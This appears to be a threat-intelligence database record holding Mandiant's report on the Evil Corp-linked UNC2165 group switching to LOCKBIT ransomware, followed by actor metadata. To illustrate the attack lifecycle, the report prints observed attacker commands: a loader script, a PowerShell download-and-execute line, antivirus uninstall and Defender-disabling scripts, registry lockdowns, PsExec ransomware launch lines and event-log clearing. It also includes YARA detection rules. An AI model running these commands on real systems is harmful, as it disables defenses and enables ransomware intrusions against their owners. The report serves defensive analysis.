{
	"id": "5431f020-e3a8-4eca-9f1a-ea8652c965ee",
	"created_at": "2026-04-06T00:11:35.298433Z",
	"updated_at": "2026-04-10T13:11:24.933552Z",
	"deleted_at": null,
	"sha1_hash": "6e9553c0cd65809465809a31b2814f4f26acbefd",
	"title": "To HADES and Back: UNC2165 Shifts to LOCKBIT to Evade Sanctions | Mandiant",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 181236,
	"plain_text": "To HADES and Back: UNC2165 Shifts to LOCKBIT to Evade Sanctions\r\nBy Mandiant\r\nPublished: 2022-06-02 · Archived: 2026-04-05 21:20:55 UTC\r\nWritten by: Mandiant Intelligence\r\nThe U.S. Treasury Department's Office of Foreign Assets Control (OFAC) sanctioned the entity known as Evil Corp in\r\nDecember 2019, citing the group's extensive development, use, and control of the DRIDEX malware ecosystem. Since\r\nthe sanctions were announced, Evil Corp-affiliated actors appear to have continuously changed the ransomware they use\r\n(Figure 1). Specifically, following an October 2020 OFAC advisory, there was a cessation of WASTEDLOCKER activity\r\nand the emergence of multiple closely related ransomware variants in relatively quick succession. These developments\r\nsuggested that the actors faced challenges in receiving ransom payments following their ransomware's public association\r\nwith Evil Corp.\r\nMandiant has investigated multiple LOCKBIT ransomware intrusions attributed to UNC2165, a financially motivated threat\r\ncluster that shares numerous overlaps with the threat group publicly reported as \"Evil Corp.\" UNC2165 has been active\r\nsince at least 2019 and almost exclusively obtains access into victim networks via the FAKEUPDATES infection chain,\r\ntracked by Mandiant as UNC1543. Previously, we have observed UNC2165 deploy HADES ransomware. 
Based on the\r\noverlaps between UNC2165 and Evil Corp, we assess with high confidence that these actors have shifted away from using\r\nexclusive ransomware variants to LOCKBIT—a well-known ransomware as a service (RaaS)—in their operations, likely to\r\nhinder attribution efforts in order to evade sanctions.\r\nFigure 1: Ransomware families believed to be associated with Evil Corp-affiliated actors (21-00014631)\r\nUNC2165 Overlaps with Evil Corp Activity\r\nOFAC sanctions against Evil Corp in December 2019 were announced in conjunction with the Department of Justice's\r\n(DOJ) unsealing of indictments against individuals for their roles in the Bugat malware operation, updated versions of which\r\nwere later called DRIDEX. DRIDEX was believed to operate under an affiliate model with multiple actors involved in the\r\ndistribution of the malware. While the malware was initially used as a traditional banking Trojan, beginning as early as 2018,\r\nwe increasingly observed DRIDEX used as a conduit to deploy post-exploitation frameworks onto victim\r\nmachines. Security researchers also began to report DRIDEX preceding BITPAYMER deployments, which was consistent\r\nwith a broader emerging trend at the time of ransomware being deployed post-compromise in victim environments.\r\nAlthough Evil Corp was sanctioned for the development and distribution of DRIDEX, the group was already beginning to\r\nshift towards more lucrative ransomware operations.\r\nUNC2165 activity likely represents another evolution in Evil Corp-affiliated actors' operations. Numerous reports have\r\nhighlighted the progression of linked activity, including the development of new ransomware families and a reduced reliance on\r\nDRIDEX to enable intrusions. 
Despite these apparent efforts to obscure attribution, UNC2165 has notable similarities to\r\noperations publicly attributed to Evil Corp, including a heavy reliance on FAKEUPDATES to obtain initial access to victims\r\nand overlaps in their infrastructure and use of particular ransomware families.\r\nUNC2165 has almost exclusively obtained initial access to victims' networks from UNC1543. UNC1543 is a\r\nfinancially motivated threat cluster that has distributed FAKEUPDATES since at least April 2018. In the months prior\r\nto the indictments, Mandiant reported on FAKEUPDATES being used as the initial infection vector for DRIDEX\r\ninfections that later resulted in the deployment of BITPAYMER or DOPPELPAYMER.\r\nUNC2165 has deployed HADES ransomware, which has code and functional similarities to other ransomware\r\nbelieved to be associated with Evil Corp-affiliated threat actors.\r\nhttps://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions\r\nPage 1 of 8\n\nUNC2165-attributed BEACON payloads and command and control (C\u0026C) servers have also been publicly reported\r\nby other security vendors in association with suspected Evil Corp activity (Table 1).\r\nTable 1: Examples of UNC2165 BEACON C\u0026C servers reported by others as Evil Corp\r\nOverlaps With “SilverFish” Reporting\r\nUNC2165 also has overlaps with a cluster of activity dubbed \"SilverFish\" by ProDaft. 
Mandiant reviewed the information in\r\nthis report and determined that the analyzed malware administration panel is used to manage FAKEUPDATES infections\r\nand to distribute secondary payloads, including BEACON. We believe that at least some of the described activity can be\r\nattributed to UNC2165 based on malware payloads and other technical artifacts included in the report.\r\nA command appearing in a screenshot within the ProDaft report is consistent with UNC2165 activity. This command\r\nreportedly executes a BEACON payload that communicates with the C\u0026C domain tanzaniafisheries[.]com from\r\na .csproj file using msbuild.exe. We attribute this BEACON C\u0026C domain to UNC2165 and have routinely\r\nobserved UNC2165 leveraging this same technique to load BEACON shellcode payloads via .csproj files. The\r\nexecution of this command via the FAKEUPDATES C\u0026C server suggests that UNC2165 has at least some level of\r\naccess to the admin panel to execute commands and launch payloads post-compromise.\r\nSince June 2020, all BEACON payloads that we have observed delivered via FAKEUPDATES have been\r\nattributed to UNC2165 based on their ownership by a common bulletproof hosting client and observed post-exploitation TTPs.\r\nFAKEUPDATES has also delivered NETSUPPORT during this period, but we do not currently attribute this\r\nactivity to UNC2165. NETSUPPORT is most likely used to monetize infections on machines belonging to\r\nindividuals rather than organizations by stealing credentials and other sensitive personal information.\r\nThe ProDaft report contains an image that shows secondary payloads are uploaded directly in the panel and\r\nreferenced by a file ID number. The script that we have seen loading COLORFAKE is consistent with this activity, as\r\nit includes the following reference: fileid = '\u003cnumber\u003e' (e.g. 
var fileid = '190').\r\nAttack Lifecycle\r\nWhile UNC2165 activity dates to at least June 2020, the following TTPs are focused on intrusions where we directly\r\nobserved ransomware deployed.\r\nInitial Compromise and Establish Foothold\r\nUNC2165 has primarily gained access to victim organizations via FAKEUPDATES infections that ultimately deliver loaders\r\nto deploy BEACON samples on impacted hosts. The loader portion of UNC2165 Cobalt Strike payloads has changed\r\nfrequently, but they have continually used BEACON in most intrusions since 2020. Beyond FAKEUPDATES, we have also\r\nobserved UNC2165 leverage suspected stolen credentials to obtain initial access.\r\nDuring 2021, UNC2165 leveraged publicly available loaders, including DONUT, to deploy BEACON payloads;\r\nhowever, intrusions observed since late 2021 have used the COLORFAKE (aka Blister) dropper.\r\nIn recent UNC2165 intrusions where COLORFAKE was used, we recovered JavaScript artifacts showing the initial\r\ndelivery of COLORFAKE payloads via FAKEUPDATES. 
The payloads to be downloaded each have a \"fileid\" value\r\nthat FAKEUPDATES will retrieve and write to disk (Figure 2).\r\nThe COLORFAKE DLL is placed within %ProgramData% as a .tmp file, renamed to a DLL, and\r\nsubsequently executed by RunDLL32 with its export function.\r\nvar filename = 'VIDRESZR1.dll';\r\nvar fileid = '190';\r\nvar replyContent = getFileContentByFileId(fileid);\r\nvar folder = wsh.ExpandEnvironmentStrings('%programdata%');\r\nvar tempFileName = '';\r\ndo {\r\n tempFileName = fso.BuildPath(folder, fso.GetTempName());\r\n} while ( fso.FileExists(tempFileName) );\r\nwriteContentToFile(tempFileName, replyContent);\r\nwsh.Run('cmd /C rename \"'+tempFileName+'\" \"'+filename+'\"', 0, true);\r\nFigure 2: Deployment of COLORFAKE loader\r\nEscalate Privileges\r\nUNC2165 has taken multiple common approaches to privilege escalation across its intrusions, including Mimikatz and\r\nKerberoasting attacks, targeting authentication data stored in the Windows registry, and searching for documents or files\r\nassociated with password managers or that may contain plaintext credentials.\r\nUNC2165 has used a service account to extract copies of the Windows SECURITY registry hives.\r\nUNC2165 has used Mimikatz and performed Kerberoasting attacks to obtain extensive credential access in target\r\nenvironments. Kerberos data output files generated by UNC2165 are typically placed in the %ProgramData% root\r\ndirectory (Figure 3). The threat actors also test the acquired credentials across the target domain to identify where\r\nthey will work.\r\nUNC2165 has searched for terms including keep, avamar, kdb, netapp, pass, and passw to identify files or systems\r\nthat may contain credentials or sensitive data for exfiltration purposes. 
Additionally, the threat actors have directly\r\naccessed and exported passwords from enterprise password managers.\r\nUNC2165 has used tools, including KEETHIEF/KEETHEFT and SecretServerSecretStealer, to gather key material\r\nfrom KeePass and decrypt secrets from Thycotic Secret Server.\r\ncmd.exe /C cmd /c powershell -nop -exec bypass -c iex(new-object net.webclient).downloadstring('https://raw.githubusercon\r\nFigure 3: UNC2165 downloads Kerberoasting utility from GitHub\r\nInternal Reconnaissance\r\nFollowing UNC1543 FAKEUPDATES infections, we commonly see a series of built-in Microsoft Windows utilities such\r\nas whoami, nltest, cmdkey, and net used against newly accessed systems to gather data and learn more about the victim\r\nenvironment. The majority of these commands are issued using one larger, semicolon-delimited list of enumeration\r\ncommands, followed up by additional PowerShell reconnaissance (Figure 4). We attribute this initial reconnaissance activity\r\nto UNC1543 as it occurs prior to UNC2165 BEACON deployment; however, the collected information almost certainly enables\r\ndecision-making for UNC2165. 
During intrusions, UNC2165 has used multiple common third-party tools to enable\r\nreconnaissance of victim networks and has accessed internal systems to obtain information used to guide its intrusion\r\noperations.\r\nIn one intrusion, UNC2165 downloaded and executed the Advanced Port Scanner utility.\r\nUNC2165 has downloaded and installed the asset management tool Lansweeper.\r\nUNC2165 has accessed a victim's VMware vCenter, which provided information about host configurations, clusters,\r\nand storage devices in the organization's virtualization environment.\r\nUNC2165 accessed a Trend Micro OfficeScan management console and viewed admin roles and other configuration\r\ninformation.\r\ncmd.exe /C powershell /c nltest /dclist: ; nltest /domain_trusts ; cmdkey /list ; net group 'Domain Admins' /domain ; net\r\ncmd.exe /C powershell /c \"Get-WmiObject win32_service -ComputerName localhost | Where-Object {$_.PathName -notmatch 'c:\\\\w\r\nFigure 4: UNC1543 reconnaissance commands; common precursor to UNC2165\r\nLateral Movement and Maintain Presence\r\nUNC2165 relies heavily on Cobalt Strike BEACON to enable lateral movement and maintain presence in a victim\r\nenvironment. Beyond its use of BEACON, UNC2165 has also used common administrative protocols and software to enable\r\nlateral movement, including RDP and SSH.\r\nThe threat actors connected via SSH to enterprise storage systems using PuTTY.\r\nUNC2165 has moved laterally within victim environments via RDP.\r\nIn support of both persistence and lateral movement, UNC2165 has created local system accounts and added them to\r\ngroups including local administrator and RDP users.\r\nIn at least one case, UNC2165 maintained access to a victim environment via its corporate VPN infrastructure.\r\nComplete Mission\r\nIn most cases, UNC2165 has stolen data from its victims to use as leverage for extortion after it has deployed ransomware\r\nacross an environment. 
In intrusions where the data exfiltration method could be identified, there is evidence to suggest the\r\ngroup used either Rclone or MEGASync to transfer data from the victims' environments prior to encryption. The Rclone\r\nutility is used by many financially motivated actors to synchronize sensitive files with cloud storage providers, and\r\nMEGASync synchronizes data to the MEGA cloud hosting service.\r\nUNC2165 has leveraged multiple Windows batch scripts during the final phases of its operations to deploy ransomware and\r\nmodify systems to aid the ransomware's propagation. We have observed UNC2165 use both HADES and LOCKBIT; we have\r\nnot seen these threat actors use HADES since early 2021. Notably, LOCKBIT is a prominent Ransomware-as-a-Service\r\n(RaaS) affiliate program, which we track as UNC2758, that has been advertised in underground forums since early 2020\r\n(21-00026166).\r\nUNC2165 uses a script that forces Group Policy updates and adds all files with EXE, BAT, or DLL extensions and\r\nthe C:\\Programdata\\ and C:\\Windows\\ directories to the Windows Defender exclusions list (Figure 5).\r\nUNC2165 scripts have also used WMI to stop and uninstall anti-virus products and other Windows Services prior to\r\nransomware deployment (Figure 6).\r\nUNC2165 has used scripts to modify multiple Windows Registry keys with an aim to remove some barriers to\r\nransomware execution and disable utilities commonly used by administrators such as the Windows task manager,\r\nregistry tools, and the command prompt (Figure 7).\r\nUNC2165 has employed a ransomware execution script that initiates the encryption process using PSEXEC. 
This\r\nscript also disables Windows Defender and clears the Windows event logs (Figure 8).\r\ngpupdate /force\r\npowershell.exe -command Add-MpPreference -ExclusionExtension \".bat\"\r\npowershell.exe -command Add-MpPreference -ExclusionExtension \".exe\"\r\npowershell.exe -command Add-MpPreference -ExclusionExtension \".dll\"\r\npowershell.exe -command Add-MpPreference -ExclusionPath \"C:\\Programdata\\\"\r\npowershell.exe -command Add-MpPreference -ExclusionPath \"C:\\Windows\\\"\r\nFigure 5: Sample script forcing Group Policy update\r\nwmic product where name=\"CarbonBlack Sensor\" call uninstall /nointeractive\r\nwmic product where name=\"Carbon Black Sensor\" call uninstall /nointeractive\r\nwmic product where name=\"Carbon Black Cloud Sensor 64-bit\" call uninstall /nointeractive\r\nwmic product where name=\"CarbonBlack Cloud Sensor 64-bit\" call uninstall /nointeractive\r\nwmic product where name=\"Cb Defense Sensor 64-bit\" call uninstall /nointeractive\r\nwmic product where \"name like '%%Cb Defense%%'\" call uninstall /nointeractive\r\nwmic product where name=\"Dell Threat Defense\" call uninstall /nointeractive\r\nwmic product where name=\"Cylance PROTECT\" call uninstall /nointeractive\r\nwmic product where name=\"Cylance Unified Agent\" call uninstall /nointeractive\r\nwmic product where name=\"Cylance PROTECT - Dell Plugins\" call uninstall /nointeractive\r\nwmic product where name=\"Microsoft Security Client\" call uninstall /nointeractive\r\nwmic product where name=\"LogRhythm System Monitor Service\" call uninstall /nointeractive\r\nwmic product where name=\"Microsoft Endpoint Protection Management Components\" call uninstall /nointeractive\r\nwmic service where \"caption like '%%LogRhythm%%'\" call stopservice\r\nwmic service where \"caption like '%%SQL%%'\" call stopservice\r\nwmic service where \"caption like '%%Exchange%%'\" call stopservice\r\nwmic service where \"caption like '%%Malwarebytes%%'\" call stopservice\r\nFigure 6: Sample 
script to uninstall antivirus products\r\n reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\" /f /v \"HidePowerOptions\" /t REG_DWORD /d 1\r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\" /f /v \"HidePowerOptions\" /t REG_DWORD /d 1\r\nreg add \"HKCU\\Software\\Policies\\Microsoft\\Windows\\Explorer\" /f /v \"DisableNotificationCenter\" /t REG_DWORD /d 1\r\nreg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\PushNotifications\" /f /v \"ToastEnabled\" /t REG_DWORD /d 0\r\nreg add \"hklm\\system\\currentcontrolset\\control\\Storage\" /f /v \"write Protection\" /t REG_DWORD /d 0\r\nreg add \"hklm\\system\\currentcontrolset\\control\\StorageDevicePolicies\" /f /v \"writeprotect\" /t REG_DWORD /d 0\r\nreg add \"hklm\\system\\currentcontrolset\\Services\\LanmanServer\\Parameters\" /f /v \"AutoShareWks\" /t REG_DWORD /d 1\r\nreg add \"hklm\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\system\" /f /v \"LocalAccountTokenFilterPolicy\" /t REG_DWOR\r\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\UX Configuration\" /v \"Notification_Suppress\" /t REG_DWORD /d \"\r\nreg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /v \"DisableTaskMgr\" /t REG_DWORD /d \"1\" /f\r\nreg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /v \"DisableCMD\" /t REG_DWORD /d \"1\" /f\r\nreg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /v \"DisableRegistryTools\" /t REG_DWORD /d \"1\" /f\r\nreg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\" /v \"NoRun\" /t REG_DWORD /d \"1\" /f\r\nFigure 7: Sample script to edit the Windows Registry\r\ncd c:\\\u0026PsExec.exe -accepteula -d -h -high -u .\\\u003cUSERNAME\u003e -p \"\u003cPASSWORD\u003e\" c:\\\u003cRANSOMWARE_BINARY\u003e.exe\r\ncd c:\\\u0026PsExec.exe -accepteula -d -h -i -high -u .\\\u003cUSERNAME\u003e -p 
\"\u003cPASSWORD\u003e\" c:\\\u003cRANSOMWARE_BINARY\u003e.exe\r\ncd c:\\\u0026PsExec.exe -accepteula -d -h -u .\\\u003cUSERNAME\u003e -p \"\u003cPASSWORD\u003e\" c:\\\u003cRANSOMWARE_BINARY\u003e.exe\r\ncd c:\\\u0026PsExec.exe -accepteula -d -h -i -u .\\\u003cUSERNAME\u003e -p \"\u003cPASSWORD\u003e\" c:\\\u003cRANSOMWARE_BINARY\u003e.exe\r\ntasklist | findstr /i \u003cRANSOMWARE_BINARY\u003e \u003e \\\\\u003cREDACTED\u003e\\\u003cREDACTED\u003e\\\u003cREDACTED\u003e\\%COMPUTERNAME%.txt\r\ncmd.exe /c \"C:\\Program Files\\Windows Defender\\MpCmdRun.exe\" -RemoveDefinitions -All\r\nsc stop WinDefend\r\nsc config WinDefend start= disabled\r\nsc delete WinDefend\r\nfor /F \"tokens=*\" %%1 in ('wevtutil.exe el') DO wevtutil.exe cl \"%%1\"\r\nFigure 8: Sample script to execute LOCKBIT binary\r\nPossibly Affiliated Threat Actor\r\nBased on information from trusted sensitive sources and underground forum activity, we have moderate confidence that a\r\nparticular actor operating on underground forums is affiliated with UNC2165. Additional details are available in Mandiant\r\nAdvantage.\r\nMandiant has previously highlighted a cluster of BEACON C\u0026C services hosted on yalishanda's bulletproof hosting\r\nservice that we believe is operated by a common threat actor. Information gleaned from trusted, sensitive sources\r\nrevealed that account information associated with this client has also been used by the actor in underground forums.\r\nThis actor’s underground forum activity is consistent with TTPs used in UNC2165 operations.\r\nIn April 2022, the actor appeared to purchase VPN access to a wholesale distribution company with an annual\r\nrevenue of $3 billion USD and has expressed interest in purchasing additional network accesses. Although\r\nless common, we have seen UNC2165 use suspected stolen credentials in intrusions. 
\r\nBetween December 2019 and August 2020, the actor posted at least twice on exploit[.]in seeking to\r\npurchase versions of Cobalt Strike.\r\nBeginning in July 2019, they have made several posts on exploit[.]in seeking services and tools for\r\nobfuscating malware to avoid detection.\r\nWe also identified a GitHub profile matching the actor’s username, and while the account’s activity is limited, it is\r\nconsistent with UNC2165 operations. Most notably, the actor opened an issue for a project in which they included\r\ncommand line arguments showing that they were attempting to build a .csproj shellcode runner. UNC2165\r\nused .csproj files extensively during this time period to deploy BEACON payloads and has\r\nleveraged .csproj files to deploy BEACON that are consistent with the project for which the issue was opened.\r\nImplications\r\nThe U.S. Government has increasingly leveraged sanctions as a part of a broader toolkit to tackle ransomware operations.\r\nThis has included sanctions on both actors directly involved in ransomware operations as well as cryptocurrency exchanges\r\nthat have received illicit funds. These sanctions have had a direct impact on threat actor operations, particularly as at least\r\nsome companies involved in ransomware remediation activities, such as negotiation, refuse to facilitate payments to known\r\nsanctioned entities. This can ultimately reduce threat actors' ability to be paid by victims, which is the primary driver of\r\nransomware operations.\r\nThe adoption of an existing ransomware is a natural evolution for UNC2165 to attempt to obscure their affiliation with Evil\r\nCorp. Both the prominence of LOCKBIT in recent years and its successful use by several different threat clusters likely\r\nmade the ransomware an attractive choice. 
Using this RaaS would allow UNC2165 to blend in with other affiliates,\r\nrequiring visibility into earlier stages of the attack lifecycle to properly attribute the activity, compared to prior operations\r\nthat may have been attributable based on the use of an exclusive ransomware. Additionally, the frequent code updates and\r\nrebranding of HADES required development resources, and it is plausible that UNC2165 saw the use of LOCKBIT as a more\r\ncost-effective choice. The use of a RaaS would eliminate the ransomware development time and effort, allowing resources to\r\nbe used elsewhere, such as broadening ransomware deployment operations. Its adoption could also temporarily afford the\r\nactors more time to develop a completely new ransomware from scratch, limiting the ability of security researchers to easily\r\ntie it to previous Evil Corp operations.\r\nIt is plausible that the actors behind UNC2165 operations will continue to take additional steps to distance themselves from\r\nthe Evil Corp name. For example, the threat actors could choose to abandon their use of FAKEUPDATES, an operation with\r\nwell-documented links to Evil Corp actors, in favor of a newly developed delivery vector, or may look to acquire access from\r\nunderground communities. Some evidence of this developing trend already exists, given that UNC2165 has leveraged stolen\r\ncredentials in a subset of intrusions, which is consistent with a suspected member’s underground forum activity. 
We expect\r\nthese actors, as well as others who are sanctioned in the future, to take steps such as these to obscure their identities in order\r\nto ensure that it is not a limiting factor to receiving payments from victims.\r\nTechnical Appendix\r\nMITRE ATT\u0026CK Mapping\r\nMandiant has observed UNC2165 use the following techniques.\r\nImpact\r\nT1486: Data Encrypted for Impact\r\nT1489: Service Stop\r\nT1490: Inhibit System Recovery\r\nT1529: System Shutdown/Reboot\r\nDefense Evasion\r\nT1027: Obfuscated Files or Information\r\nT1027.005: Indicator Removal from Tools\r\nT1036: Masquerading\r\nT1055: Process Injection\r\nT1055.002: Portable Executable Injection\r\nT1070.001: Clear Windows Event Logs\r\nT1070.004: File Deletion\r\nT1070.005: Network Share Connection Removal\r\nT1070.006: Timestomp\r\nT1078: Valid Accounts\r\nT1112: Modify Registry\r\nT1127.001: MSBuild\r\nT1134: Access Token Manipulation\r\nT1134.001: Token Impersonation/Theft\r\nT1140: Deobfuscate/Decode Files or Information\r\nT1202: Indirect Command Execution\r\nT1218.005: Mshta\r\nT1218.011: Rundll32\r\nT1497: Virtualization/Sandbox Evasion\r\nT1497.001: System Checks\r\nT1553.002: Code Signing\r\nT1562.001: Disable or Modify Tools\r\nT1562.004: Disable or Modify System Firewall\r\nT1564.003: Hidden Window\r\nT1620: Reflective Code Loading\r\nCommand and Control\r\nT1071: Application Layer Protocol\r\nT1071.001: Web Protocols\r\nT1071.004: DNS\r\nT1090.004: Domain Fronting\r\nT1095: Non-Application Layer Protocol\r\nT1105: Ingress Tool Transfer\r\nT1573.002: Asymmetric Cryptography\r\nCollection\r\nT1056.001: Keylogging\r\nT1113: Screen Capture\r\nT1115: Clipboard Data\r\nT1560: Archive Collected Data\r\nT1602.002: Network Device Configuration Dump\r\nDiscovery\r\nT1007: System Service Discovery\r\nT1010: Application Window Discovery\r\nT1012: Query Registry\r\nT1016: System Network Configuration Discovery\r\nT1033: System Owner/User Discovery\r\nT1049: System Network Connections Discovery\r\nT1057: Process Discovery\r\nT1069: Permission Groups Discovery\r\nT1069.001: Local Groups\r\nT1069.002: Domain Groups\r\nT1082: System Information Discovery\r\nT1083: File and Directory Discovery\r\nT1087: Account Discovery\r\nT1087.001: Local Account\r\nT1087.002: Domain Account\r\nT1482: Domain Trust Discovery\r\nT1518: Software Discovery\r\nT1614.001: System Language Discovery\r\nLateral Movement\r\nT1021.001: Remote Desktop Protocol\r\nT1021.002: SMB/Windows Admin Shares\r\nT1021.004: SSH\r\nExfiltration\r\nT1020: Automated Exfiltration\r\nExecution\r\nT1047: Windows Management Instrumentation\r\nT1053: Scheduled Task/Job\r\nT1053.005: Scheduled Task\r\nT1059: Command and Scripting Interpreter\r\nT1059.001: PowerShell\r\nT1059.003: Windows Command Shell\r\nT1059.005: Visual Basic\r\nT1059.007: JavaScript\r\nT1569.002: Service Execution\r\nPersistence\r\nT1098: Account Manipulation\r\nT1136: Create Account\r\nT1136.001: Local Account\r\nT1543.003: Windows Service\r\nT1547.001: Registry Run Keys / Startup Folder\r\nT1547.009: Shortcut Modification\r\nCredential Access\r\nT1003.001: LSASS Memory\r\nT1003.002: Security Account Manager\r\nT1552.002: Credentials in Registry\r\nT1558: Steal or Forge Kerberos Tickets\r\nT1558.003: Kerberoasting\r\nInitial Access\r\nT1133: External Remote Services\r\nT1189: Drive-by Compromise\r\nResource Development\r\nT1588.003: Code Signing Certificates\r\nT1588.004: Digital Certificates\r\nT1608.003: Install Digital Certificate\r\nLOCKBIT YARA Rules\r\nThe following YARA rules are not intended to be used on production systems or to inform blocking rules without first being\r\nvalidated through an organization's own internal testing processes to ensure appropriate performance and limit the risk of\r\nfalse positives. 
These rules are intended to serve as a starting point for hunting efforts to identify LOCKBIT activity;\r\nhowever, they may need adjustment over time if the malware family changes.\r\nrule LOCKBIT_Note_PE_v1\r\n{\r\n strings:\r\n $onion = /http:\\/\\/lockbit[a-z0-9]{9,49}.onion/ ascii wide\r\n $note1 = \"restore-my-files.txt\" nocase ascii wide\r\n $note2 = /lockbit[_-](ransomware|note)\\.hta/ nocase ascii wide\r\n $v2 = \"LockBit_2_0_Ransom\" nocase wide\r\n condition:\r\n (uint16(0) == 0x5A4D) and (uint32(uint32(0x3C)) == 0x00004550)\r\n and $onion\r\n and (all of ($note*)) and not $v2\r\n}\r\nFigure 9: LOCKBIT YARA rule detects PE files with strings related to LOCKBIT v1 ransom notes\r\nrule LOCKBIT_Note_PE_v2\r\n{\r\n strings:\r\n $onion = /http:\\/\\/lockbit[a-z0-9]{9,49}.onion/ ascii wide\r\n $note1 = \"restore-my-files.txt\" nocase ascii wide\r\n $note2 = /lockbit[_-](ransomware|note)\\.hta/ nocase ascii wide\r\n $v2 = \"LockBit_2_0_Ransom\" nocase wide\r\n condition:\r\n (uint16(0) == 0x5A4D) and (uint32(uint32(0x3C)) == 0x00004550) and all of them\r\n}\r\nFigure 10: LOCKBIT YARA rule detects PE files with strings related to LOCKBIT 2.0 ransom notes\r\nSource: https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions"
	],
	"report_names": [
		"unc2165-shifts-to-evade-sanctions"
	],
	"threat_actors": [
		{
			"id": "8670f370-1865-4264-9a1b-0dfe7617c329",
			"created_at": "2022-10-25T16:07:23.69953Z",
			"updated_at": "2026-04-10T02:00:04.716126Z",
			"deleted_at": null,
			"main_name": "Hades",
			"aliases": [
				"Operation TrickyMouse"
			],
			"source_name": "ETDA:Hades",
			"tools": [
				"Brave Prince",
				"Gold Dragon",
				"GoldDragon",
				"Lovexxx",
				"Olympic Destroyer",
				"Running RAT",
				"RunningRAT",
				"SOURGRAPE",
				"running_rat"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "50068c14-343c-4491-b568-df41dd59551c",
			"created_at": "2022-10-25T15:50:23.253218Z",
			"updated_at": "2026-04-10T02:00:05.234464Z",
			"deleted_at": null,
			"main_name": "Indrik Spider",
			"aliases": [
				"Indrik Spider",
				"Evil Corp",
				"Manatee Tempest",
				"DEV-0243",
				"UNC2165"
			],
			"source_name": "MITRE:Indrik Spider",
			"tools": [
				"Mimikatz",
				"PsExec",
				"Dridex",
				"WastedLocker",
				"BitPaymer",
				"Cobalt Strike"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "ebc139d2-7450-46f5-a9e4-e7d561133fa5",
			"created_at": "2024-04-24T02:00:49.453475Z",
			"updated_at": "2026-04-10T02:00:05.321256Z",
			"deleted_at": null,
			"main_name": "Mustard Tempest",
			"aliases": [
				"Mustard Tempest",
				"DEV-0206",
				"TA569",
				"GOLD PRELUDE",
				"UNC1543"
			],
			"source_name": "MITRE:Mustard Tempest",
			"tools": [
				"SocGholish",
				"Cobalt Strike"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "b296f34c-c424-41da-98bf-90312a5df8ef",
			"created_at": "2024-06-19T02:03:08.027585Z",
			"updated_at": "2026-04-10T02:00:03.621193Z",
			"deleted_at": null,
			"main_name": "GOLD DRAKE",
			"aliases": [
				"Evil Corp",
				"Indrik Spider",
				"Manatee Tempest"
			],
			"source_name": "Secureworks:GOLD DRAKE",
			"tools": [
				"BitPaymer",
				"Cobalt Strike",
				"Covenant",
				"Donut",
				"Dridex",
				"Hades",
				"Koadic",
				"LockBit",
				"Macaw Locker",
				"Mimikatz",
				"Payload.Bin",
				"Phoenix CryptoLocker",
				"PowerShell Empire",
				"PowerSploit",
				"SocGholish",
				"WastedLocker"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "3bf456e4-84ee-48fd-b3ab-c10d54a48a34",
			"created_at": "2024-06-19T02:03:08.096988Z",
			"updated_at": "2026-04-10T02:00:03.82859Z",
			"deleted_at": null,
			"main_name": "GOLD PRELUDE",
			"aliases": [
				"Mustard Tempest ",
				"TA569 ",
				"UNC1543 "
			],
			"source_name": "Secureworks:GOLD PRELUDE",
			"tools": [
				"SocGholish"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "9806f226-935f-48eb-b138-6616c9bb9d69",
			"created_at": "2022-10-25T16:07:23.73153Z",
			"updated_at": "2026-04-10T02:00:04.729977Z",
			"deleted_at": null,
			"main_name": "Indrik Spider",
			"aliases": [
				"Blue Lelantos",
				"DEV-0243",
				"Evil Corp",
				"G0119",
				"Gold Drake",
				"Gold Winter",
				"Manatee Tempest",
				"Mustard Tempest",
				"UNC2165"
			],
			"source_name": "ETDA:Indrik Spider",
			"tools": [
				"Advanced Port Scanner",
				"Agentemis",
				"Babuk",
				"Babuk Locker",
				"Babyk",
				"BitPaymer",
				"Bugat",
				"Bugat v5",
				"Cobalt Strike",
				"CobaltStrike",
				"Cridex",
				"Dridex",
				"EmPyre",
				"EmpireProject",
				"FAKEUPDATES",
				"FakeUpdate",
				"Feodo",
				"FriedEx",
				"Hades",
				"IEncrypt",
				"LINK_MSIEXEC",
				"MEGAsync",
				"Macaw Locker",
				"Metasploit",
				"Mimikatz",
				"PayloadBIN",
				"Phoenix Locker",
				"PowerShell Empire",
				"PowerSploit",
				"PsExec",
				"QNAP-Worm",
				"Raspberry Robin",
				"RaspberryRobin",
				"SocGholish",
				"Vasa Locker",
				"WastedLoader",
				"WastedLocker",
				"cobeacon",
				"wp_encrypt"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "6c4f98b3-fe14-42d6-beaa-866395455e52",
			"created_at": "2023-01-06T13:46:39.169554Z",
			"updated_at": "2026-04-10T02:00:03.23458Z",
			"deleted_at": null,
			"main_name": "Evil Corp",
			"aliases": [
				"GOLD DRAKE"
			],
			"source_name": "MISPGALAXY:Evil Corp",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "544cac23-af15-4100-8f20-46c07962cbfa",
			"created_at": "2023-01-06T13:46:39.484133Z",
			"updated_at": "2026-04-10T02:00:03.34364Z",
			"deleted_at": null,
			"main_name": "GOLD PRELUDE",
			"aliases": [
				"TA569",
				"UNC1543"
			],
